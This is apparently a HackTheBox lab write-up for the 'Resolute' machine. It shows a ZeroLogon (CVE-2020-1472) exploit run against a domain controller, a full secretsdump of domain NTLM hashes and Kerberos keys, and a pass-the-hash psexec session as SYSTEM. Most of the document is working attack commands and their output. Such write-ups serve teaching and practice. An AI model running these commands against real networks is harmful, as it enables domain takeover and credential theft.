CVE-2020-1472
zerologon attack enables an unauthenticated attacker to remotely escalate their privileges straight to Domain Admin, with network access to a domain controller as the only requirement.
the vulnerability is present at an insecure implementation of AES-CFB8 in the MS-NRPC by brute-forcing the authentication up to 256 times with a challenge and ciphertext consisting of 8 zero-bytes \x00', resulting the eventual match that leads to authentication bypass as the machine account. It then resets the password empty.
more about this vulnerability here
The target system is likely vulnerable given the fact that it is running Windows Server 2016 Standard
exploit (zerologon)
I got the exploit script from the GitHub repo
Exploitation
┌──(kali㉿kali)-[~/…/htb/labs/resolute/CVE-2020-1472]
└─$ python3 cve-2020-1472-exploit.py resolute $IP
Performing authentication attempts...
===============
Target vulnerable, changing account password to empty string
result: 0
Exploit complete!The exploitation is complete.
I never needed any credential. Hence the name of the exploit, ZeroLogon
The machine account RESOLUTE$ now should have no password
At this point I can do anything
Hashdump
┌──(kali㉿kali)-[~/…/htb/labs/resolute/CVE-2020-1472]
└─$ impacket-secretsdump 'megabank.local/resolute$@resolute.megabank.local' -target-ip $IP -dc-ip $IP -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fb3b106896cdaa8a08072775fbd9afe9:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:49a9276d51927d3cd34a8ac69ae39c40:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
megabank.local\ryan:1105:aad3b435b51404eeaad3b435b51404ee:3f653cb103e005246bc95ceb2f56e30b:::
megabank.local\marko:1111:aad3b435b51404eeaad3b435b51404ee:8276510304cefe6e77c3a9e910ba3a6a:::
megabank.local\sunita:6601:aad3b435b51404eeaad3b435b51404ee:4e67de165ebd5e604d6580b15cfc61b2:::
megabank.local\abigail:6602:aad3b435b51404eeaad3b435b51404ee:3f67ccb851b02ac4ee9f91eeddf1cac7:::
megabank.local\marcus:6603:aad3b435b51404eeaad3b435b51404ee:d546df40747f48ece7e2be7349ec8f1b:::
megabank.local\sally:6604:aad3b435b51404eeaad3b435b51404ee:9d5a37664c09e08e8be59ca3e76c262f:::
megabank.local\fred:6605:aad3b435b51404eeaad3b435b51404ee:7be0fca1b4aec94356b86e4b1de06c4f:::
megabank.local\angela:6606:aad3b435b51404eeaad3b435b51404ee:07fe48603fa7ada83e62d14e54f45127:::
megabank.local\felicia:6607:aad3b435b51404eeaad3b435b51404ee:74dce6edc0eabd905d42e0a7225b80f3:::
megabank.local\gustavo:6608:aad3b435b51404eeaad3b435b51404ee:0b03061f9b79bf6642fe92aee0a109c6:::
megabank.local\ulf:6609:aad3b435b51404eeaad3b435b51404ee:f3dfd5c45de7a953c82fbe99749057c2:::
megabank.local\stevie:6610:aad3b435b51404eeaad3b435b51404ee:eb41b7464f302e573aaa697d191b5569:::
megabank.local\claire:6611:aad3b435b51404eeaad3b435b51404ee:72dc9d1d791307cf5217c8e39a88f56a:::
megabank.local\paulo:6612:aad3b435b51404eeaad3b435b51404ee:4e2d8cc79e15e601c099170a645483e6:::
megabank.local\steve:6613:aad3b435b51404eeaad3b435b51404ee:b8de802a1e7862c6e0e19be9c2baff0f:::
megabank.local\annette:6614:aad3b435b51404eeaad3b435b51404ee:2f9b8f25ec94dd46ecb071c27dc82905:::
megabank.local\annika:6615:aad3b435b51404eeaad3b435b51404ee:5d7226ebae151a224ada8add01bdc21c:::
megabank.local\per:6616:aad3b435b51404eeaad3b435b51404ee:b66616eb72209b81edded1fe63ae8806:::
megabank.local\claude:6617:aad3b435b51404eeaad3b435b51404ee:f059af81cb6022dc5de6389d4a6e6a65:::
megabank.local\melanie:10101:aad3b435b51404eeaad3b435b51404ee:e4a22d8e7bbec871b341c88c2e94cba2:::
megabank.local\zach:10102:aad3b435b51404eeaad3b435b51404ee:434927d08ddb971a8b14e407a58f6e9e:::
megabank.local\simon:10103:aad3b435b51404eeaad3b435b51404ee:25bc108c637a551f8b000054ea8ddc6e:::
megabank.local\naoki:10104:aad3b435b51404eeaad3b435b51404ee:07a1070c03b1a26e53d265d27ecb1a38:::
RESOLUTE$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
MS02$:1104:aad3b435b51404eeaad3b435b51404ee:7b71dcfa93cf1f5d37d34497b632c890:::
WIN-2SJZIXAYU6P$:12101:aad3b435b51404eeaad3b435b51404ee:a19e361da6e84cc7a671440bf2fd3500:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:2c729d2a189d5ffdf4792a66eee8e7d37a6e5c37b57a722c307791e7a466f741
Administrator:aes128-cts-hmac-sha1-96:e175930b43cf0835cf361c9cb8d964b1
Administrator:des-cbc-md5:235e4979aeba1073
krbtgt:aes256-cts-hmac-sha1-96:25c34e568e89ccbc1435fbcd4a1067cf23629530d97656923a216b0de82dd333
krbtgt:aes128-cts-hmac-sha1-96:1dff59da1cf4b1c0fadd113dd2400d0b
krbtgt:des-cbc-md5:adcb106701349864
megabank.local\ryan:aes256-cts-hmac-sha1-96:1d5b6f6aaa4841a9b6fc727c114eafaf0b5cae266f2e47a81095cdce2ecc9f7c
megabank.local\ryan:aes128-cts-hmac-sha1-96:67e6a3eec4210a7c0341b72963da4f12
megabank.local\ryan:des-cbc-md5:62c279a8c1c10bd5
megabank.local\marko:aes256-cts-hmac-sha1-96:6ba81690c81b99f828a7d250e432722a95642c63ea201e8a6ba36db50116f6b2
megabank.local\marko:aes128-cts-hmac-sha1-96:7fa0f0b4a72a1ee50c5340ff5f2e7359
megabank.local\marko:des-cbc-md5:46b083b08a79e973
megabank.local\sunita:aes256-cts-hmac-sha1-96:1c31eaa2f2683cce009513f34b58ffcb880910ba9ae2a493a7850e3e1f55208b
megabank.local\sunita:aes128-cts-hmac-sha1-96:b055a012e88ad88a1478e913054d472c
megabank.local\sunita:des-cbc-md5:898ae62a8989832a
megabank.local\abigail:aes256-cts-hmac-sha1-96:a8473d8954d7f3b017561af651e3683eceb8adab27dad0d97a64fe9889c6c600
megabank.local\abigail:aes128-cts-hmac-sha1-96:c1882b7df861cc12bcf86b490793b8e1
megabank.local\abigail:des-cbc-md5:f4388a54e080d610
megabank.local\marcus:aes256-cts-hmac-sha1-96:ed97b881856e9f256976c4317270df2b0c383137f4a2d9289a30a0c8ac9568f0
megabank.local\marcus:aes128-cts-hmac-sha1-96:91e53044de3baa093817db78e7bfc957
megabank.local\marcus:des-cbc-md5:078c4adf98cbb943
megabank.local\sally:aes256-cts-hmac-sha1-96:f3f57f7f0f5ae1de03e946f01f641565a1744deb115e20095e1a48af7341c548
megabank.local\sally:aes128-cts-hmac-sha1-96:3db0cdd0bfa2b9388bfb98885affe537
megabank.local\sally:des-cbc-md5:c4c1f4e9ab98574f
megabank.local\fred:aes256-cts-hmac-sha1-96:f6125e4c00cf1c1c9f93b5f03578eef8edde13f858012caaf500a5f57ea4b1b8
megabank.local\fred:aes128-cts-hmac-sha1-96:6432e8085f207ad837038c6bd30d95b9
megabank.local\fred:des-cbc-md5:31310e1f8c68e907
megabank.local\angela:aes256-cts-hmac-sha1-96:fd77e01c6a2ad42d79d1ab13a8991ec4987d06c5087022983dcee3e288a4319d
megabank.local\angela:aes128-cts-hmac-sha1-96:e8a5bf3aef414ee84b69d0729d8bf055
megabank.local\angela:des-cbc-md5:01f889578c32cb91
megabank.local\felicia:aes256-cts-hmac-sha1-96:d6155ece9141d52abdd40504552296306af3b108034da7170737a2cf5fb6bcb8
megabank.local\felicia:aes128-cts-hmac-sha1-96:20baa9a112699e5d2751af868ab9aefc
megabank.local\felicia:des-cbc-md5:b331a80b3876c470
megabank.local\gustavo:aes256-cts-hmac-sha1-96:4d00b13243910022a07275bd88cd5b6dfca49f82f6b0200b7f990f527bdb482b
megabank.local\gustavo:aes128-cts-hmac-sha1-96:f454326d38c881899f246fa2e711d59f
megabank.local\gustavo:des-cbc-md5:291f1c2a754943ad
megabank.local\ulf:aes256-cts-hmac-sha1-96:e4663bb3849429da167fb460e9c3d15da93c1ce50d24641411500c4bf1b3962c
megabank.local\ulf:aes128-cts-hmac-sha1-96:ebdbf19e8b51bedec2de1babc1154e6f
megabank.local\ulf:des-cbc-md5:fe2ff1da6b6d73fb
megabank.local\stevie:aes256-cts-hmac-sha1-96:f308737f7c792ac1b74f3f6855cad1860b478c8afd906df1b4b14b21d858c5b7
megabank.local\stevie:aes128-cts-hmac-sha1-96:0192b45aa6e143b340b409a377c084f0
megabank.local\stevie:des-cbc-md5:e623166449498c85
megabank.local\claire:aes256-cts-hmac-sha1-96:3a8882538cd36730a38637b23c1ce296946b94a74410568343531dfb623153e2
megabank.local\claire:aes128-cts-hmac-sha1-96:782388d0700da184fe5d978551ae9078
megabank.local\claire:des-cbc-md5:296d944998b63138
megabank.local\paulo:aes256-cts-hmac-sha1-96:0407f0c1a2d50ac27a7f60dff7165aee3ce80f3789b4d1b1bfc3568e477371e2
megabank.local\paulo:aes128-cts-hmac-sha1-96:db3794331a5cac201f9cde86fe959eef
megabank.local\paulo:des-cbc-md5:52b97f7c94808cb3
megabank.local\steve:aes256-cts-hmac-sha1-96:c1eb8da00fe9a4df1e0e85f6eec06a00afa11a19a26116aca04360bf030d379e
megabank.local\steve:aes128-cts-hmac-sha1-96:f6c379343ad9cf7ad17ae5dc339bef87
megabank.local\steve:des-cbc-md5:dcb09780e59dd36b
megabank.local\annette:aes256-cts-hmac-sha1-96:3ef07851ad3a81a2ae88587f6b1268c080d59d3e41e07bd54e97d88d9a1c7541
megabank.local\annette:aes128-cts-hmac-sha1-96:2e238dc190585c1fe68b553f9dfc7738
megabank.local\annette:des-cbc-md5:2a688045d9a868cd
megabank.local\annika:aes256-cts-hmac-sha1-96:43a85bf8df3087cd197cddeb9916887b6cfbedca675f00c3991abb344e894256
megabank.local\annika:aes128-cts-hmac-sha1-96:9bfcad30e8fe505431432b65260f0722
megabank.local\annika:des-cbc-md5:ef468ce946eaf1e5
megabank.local\per:aes256-cts-hmac-sha1-96:7b338c02de23b91a7186fb8eef8a854b17df81cf261ef11a7c2ab6150eb7de52
megabank.local\per:aes128-cts-hmac-sha1-96:bb36d55a17fbb55def6f27a0f6d9f121
megabank.local\per:des-cbc-md5:8919b902678a4f2a
megabank.local\claude:aes256-cts-hmac-sha1-96:99dd9da983f3f1c645d1e4db5097428d6e98a5858a0dc26986a6b16771f81c74
megabank.local\claude:aes128-cts-hmac-sha1-96:bcb9376a3bcb7356700423970f187291
megabank.local\claude:des-cbc-md5:f2dcfe13ea290297
megabank.local\melanie:aes256-cts-hmac-sha1-96:d99fed082814833e7a128f4f82e425ad7e0ef9e30356fe944c1d7391954240dc
megabank.local\melanie:aes128-cts-hmac-sha1-96:7c08d66da82cff1b52ce762bf4bee3bb
megabank.local\melanie:des-cbc-md5:fdb99de3a704fe32
megabank.local\zach:aes256-cts-hmac-sha1-96:4295505ced2fa3a04a0c57ba8824756cb7344c050a23cb1dfe0c96e479c4dda7
megabank.local\zach:aes128-cts-hmac-sha1-96:32fb18cc45a6f6d250f1998e1edf9b91
megabank.local\zach:des-cbc-md5:735b1c37fb68e0a1
megabank.local\simon:aes256-cts-hmac-sha1-96:22c8f32ed5a42a8d09d8a033aaf17d9b6e94454a274e084d1d26c304b8e67260
megabank.local\simon:aes128-cts-hmac-sha1-96:b3936c2e62cb02642c634cf7433e13ed
megabank.local\simon:des-cbc-md5:4c5ef42370026d86
megabank.local\naoki:aes256-cts-hmac-sha1-96:2a3bc7723b6f0190a8d4b101488e2307ca844496a0f086ca9e3667fad5cb23a1
megabank.local\naoki:aes128-cts-hmac-sha1-96:6873a96fdb162feb50a0372333f71ba8
megabank.local\naoki:des-cbc-md5:3292262c7592ea16
RESOLUTE$:aes256-cts-hmac-sha1-96:21945ed8d17ca1968a22564f45a453245b3348baf6d0696cea31d6ccec4bab7b
RESOLUTE$:aes128-cts-hmac-sha1-96:840edc4017d3f2bcfe854976c9ad2026
RESOLUTE$:des-cbc-md5:bc0804e35b3dbf64
MS02$:aes256-cts-hmac-sha1-96:09481277b7203cba30eb72cdfd03384cab3ec47c76b4c9cdd90fd9fd30d09c6b
MS02$:aes128-cts-hmac-sha1-96:dbbad923e27b1099854233b8bfb890ee
MS02$:des-cbc-md5:e6806b490d0b83b3
WIN-2SJZIXAYU6P$:aes256-cts-hmac-sha1-96:9355563837538bf7cb4b8e360f519233c7d3d0879e4bda677b3720c2d4ed5f79
WIN-2SJZIXAYU6P$:aes128-cts-hmac-sha1-96:69eb0fb0ed0c131bb930777b46ebb41c
WIN-2SJZIXAYU6P$:des-cbc-md5:571af23ebcc43dad
[*] Cleaning up... Domain Level Compromise
Shelldrop
┌──(kali㉿kali)-[~/…/htb/labs/resolute/CVE-2020-1472]
└─$ impacket-psexec 'megabank.local/administrator@resolute.megabank.local' -hashes aad3b435b51404eeaad3b435b51404ee:fb3b106896cdaa8a08072775fbd9afe9 -target-ip $IP -dc-ip $IP -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.169.....
[*] Found writable share ADMIN$
[*] Uploading file fHgEPLpx.exe
[*] Opening SVCManager on 10.10.10.169.....
[*] Creating service QDPC on 10.10.10.169.....
[*] Starting service QDPC.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
Resolute
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . :
ipv4 address. . . . . . . . . . . : 10.10.10.169
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : 10.10.10.2
tunnel adapter isatap.{a20a4417-3dc7-47b7-8f00-87cc59d9f43f}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . : System Level Compromise